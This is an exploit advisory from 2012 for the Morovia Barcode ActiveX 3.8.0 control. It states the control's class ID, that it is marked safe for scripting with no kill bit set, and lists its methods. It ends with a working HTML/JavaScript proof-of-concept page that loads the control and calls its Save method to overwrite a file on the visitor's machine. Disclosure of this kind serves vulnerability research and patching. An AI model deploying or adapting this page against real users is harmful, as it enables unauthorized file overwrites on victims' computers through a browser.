Exploit Title: Morovia Barcode ActiveX Professional 3 File Overwrite Exploit Date: July 24, 2012 Author: coolkaveh coolkaveh () rocketmail com Https://twitter.com/coolkaveh Vendor Homepage:http://www.morovia.com/component/barcode-activex/ Version: 3.8.0 Tested on: windows 7 awesome coolkaveh ========================================================================== Class MrvBarcode GUID: {18B409DA-241A-4BD8-AC69-B5D547D5B141} Number of Interfaces: 1 Default Interface: IBarcode RegKey Safe for Script: True RegkeySafe for Init: True KillBitSet: False Report for Clsid: {18B409DA-241A-4BD8-AC69-B5D547D5B141} RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPersist Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data Members : 127 BackColor BorderColor BorderStyle BorderWidth ForeColor Comment CommentMarginLeft CommentMarginRight CommentMarginTop CommentMarginBottom BarHeight BarWidthReduction message NarrowBarWidth NarrowToWideRatio SymbolMarginTop SymbolMarginBottom SymbolMarginLeft SymbolMarginRight LabelHeight LabelWidth ZoomRatio RasterImageResolution FeatureKey DataMatrixModuleSize Save Load ExportImage PDFAspectRatio PDFMaxCols PDFMaxRows PDFModuleHeight PDFModuleWidth PDFPctOverhead PDFSecurityLevel MaxicodeClass MaxicodeMode MaxicodeCountryCode MaxicodeZipCode ============================================================================ <title>Morovia Barcode ActiveX </title> <BODY> <object id=coolkaveh classid="clsid:{18B409DA-241A-4BD8-AC69-B5D547D5B141}"></object> <SCRIPT> function go() { File = "coolkaveh.txt" coolkaveh.Save(File) } </SCRIPT> <input language=JavaScript onclick=go() type=button value="Click here To Test"><br> </body> </HTML>